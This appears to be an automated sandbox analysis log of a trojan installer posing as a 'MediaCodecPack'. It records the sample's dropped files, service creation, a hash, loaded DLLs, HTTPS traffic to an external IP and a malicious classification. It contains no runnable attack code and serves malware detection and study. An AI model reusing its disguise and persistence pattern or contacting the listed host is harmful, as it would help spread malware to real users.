                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.10:49838 version: TLS 1.2
                    Source: is-UJAIS.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_da573da9-f
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004706A81_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004809F71_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004352C81_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004673A41_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0043DD501_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0043035C1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004444C81_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004345C41_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00444A701_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00486BD01_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00430EE81_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045F0C41_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004451681_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045B1741_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004694041_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004455741_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004519BC1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00487B301_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0048DF541_2_0048DF54
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_004010003_2_00401000
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_004067B73_2_004067B7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609660FA3_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092114F3_2_6092114F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6091F2C93_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096923E3_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093323D3_2_6093323D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095C3143_2_6095C314
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609503123_2_60950312
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094D33B3_2_6094D33B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093B3683_2_6093B368
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096748C3_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093F42E3_2_6093F42E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609544703_2_60954470
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609615FA3_2_609615FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A5EE3_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096D6A43_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609606A83_2_609606A8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609326543_2_60932654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609556653_2_60955665
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B7DB3_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092F74D3_2_6092F74D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609648073_2_60964807
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094E9BC3_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609379293_2_60937929
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093FAD63_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096DAE83_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094DA3A3_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60936B273_2_60936B27
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60954CF63_2_60954CF6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60950C6B3_2_60950C6B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60966DF13_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60963D353_2_60963D35
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60909E9C3_2_60909E9C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60951E863_2_60951E86
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60912E0B3_2_60912E0B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60954FF83_2_60954FF8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D1BAFD3_2_02D1BAFD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D22A803_2_02D22A80
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D1D32F3_2_02D1D32F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D170C03_2_02D170C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D0E07E3_2_02D0E07E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D2267D3_2_02D2267D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D1B6093_2_02D1B609
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D1874A3_2_02D1874A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D1BF153_2_02D1BF15
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D20DB43_2_02D20DB4
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00457F1C appears 69 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00457D10 appears 90 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00403494 appears 80 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00403684 appears 210 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 00453344 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: String function: 02D17760 appears 32 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: String function: 02D22A10 appears 135 times
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-P1HNB.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-P1HNB.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-P1HNB.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.3.drStatic PE information: Number of sections : 19 > 10
                    Source: is-JJJFI.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal96.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D0F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,3_2_02D0F8D0
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00401CE4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_00401C49 StartServiceCtrlDispatcherA,3_2_00401C49
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_00401C49 StartServiceCtrlDispatcherA,3_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmpJump to behavior
                    Source: Yara matchFile source: 3.0.mediacodecpack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.1336954414.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2575850575.0000000005A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-D6CVE.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: newwork.exe.1.exeReversingLabs: Detection: 15%
                    Source: newwork.exe.1.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: newwork.exe.1.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile read: C:\Users\user\Desktop\newwork.exe.1.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\newwork.exe.1.exe "C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -iJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntmarta.dllJump to behavior
